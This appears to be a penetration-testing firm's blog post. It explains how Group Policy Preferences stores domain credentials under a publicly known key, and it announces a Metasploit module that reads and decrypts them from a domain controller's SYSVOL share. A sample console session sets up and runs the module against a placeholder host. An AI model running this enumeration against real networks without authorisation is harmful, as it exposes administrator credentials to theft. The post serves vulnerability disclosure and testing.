Group Policy Preferences (GPP) Pwned

How to enumerate GPP credentials as a domain user with access to the SMB share on the DC.

Over the past few months I’ve had a chance to clean up some code that we’ve used internally for penetration testing for some time now. This code was built to demonstrate the weaknesses of using Group Policy Preferences (GPP) to store and distribute local or domain credentials.

Group Policy Preferences is a method that system administrators can use to create new accounts and/or update account credentials for domain-joined systems. The problem with this method is two-fold. First, Microsoft decided to encrypt the credentials (for Group Policy Preferences) using a single/non-unique secret key. In other words, this key is the same for all Windows 2008 Domain Controllers (DC). Second, they decided to publish the secret key on MSDN. This allows anyone with knowledge of the secret key to decrypt stored credentials that are identified.

Microsoft has since published a blog post alerting administrators to the risks of using GPP to manage credentials. Only normal user domain credentials are required to access the SMB SYSVOL share (where the GPP files live on the DC). Leveraging this access, we can read GPP XML files and decrypt stored credentials using the known private key.

We have found that many organizations store local admin, domain service, and even Domain Admin account credentials using GPP.  The module that I submitted to the Metasploit Github repo provides the ability to enumerate GPP credentials as a domain user with access to the SMB share on the DC. Extracted credentials will be stored in the Metasploit creds tables.

		msf > use auxiliary/scanner/smb/smb_enum_gpp msf auxiliary(smb_enum_gpp) > set SMBUSER jsmithSMBUSER => jsmithmsf auxiliary(smb_enum_gpp) > set SMBPASS Password1!SMBPASS => Password1!msf auxiliary(smb_enum_gpp) > set SMBDOMAIN ACMESMBDOMAIN => ACMEmsf auxiliary(smb_enum_gpp) > set RHOSTS 10.10.10.10RHOSTS => 10.10.10.10msf auxiliary(smb_enum_gpp) > show optionsModule options (auxiliary/scanner/smb/smb_enum_gpp):   Name		Current Setting  Required  Description––––––––		––––––––––––––––––––––––––––––  ––––––––––––––––  ––––––––––––––––––––––   RHOSTS	10.10.10.10	 yes	   The target address range or CIDR identifier   RPORT	445		 yes	   The Target port   SMBDomain	ACME		 no	   The Windows domain to use for authentication   SMBPass	Password1! 	 no	   The password for the specified username   SMBSHARE	SYSVOL		 yes	   The name of the share on the server   SMBUser	jsmith		 no        The username to authenticate as   STORE	true		 no	   Store the enumerated files in loot.   THREADS	1		 yes	   The number of concurrent threadsmsf auxiliary(smb_enum_gpp) > run[…snip..]NAME                         VALUE———––                         ——————––TYPE                         Groups.xmlUSERNAME                     AdminPASSWORD                     REDACTED!DOMAIN CONTROLLER    	     10.10.10.10DOMAIN                       acme.comCHANGED                      2010-01-01 12:00:00NEVER_EXPIRES?         	     1DISABLED                     0	
icon-praetorian-

See Praetorian in Action

Request a 30-day free trial of our Managed Continuous Threat Exposure Management solution.

About the Authors

Catch the Latest

Catch our latest exploits, news, articles, and events.

Ready to Discuss Your Next Continuous Threat Exposure Management Initiative?

Praetorian’s Offense Security Experts are Ready to Answer Your Questions

0 Shares
Copy link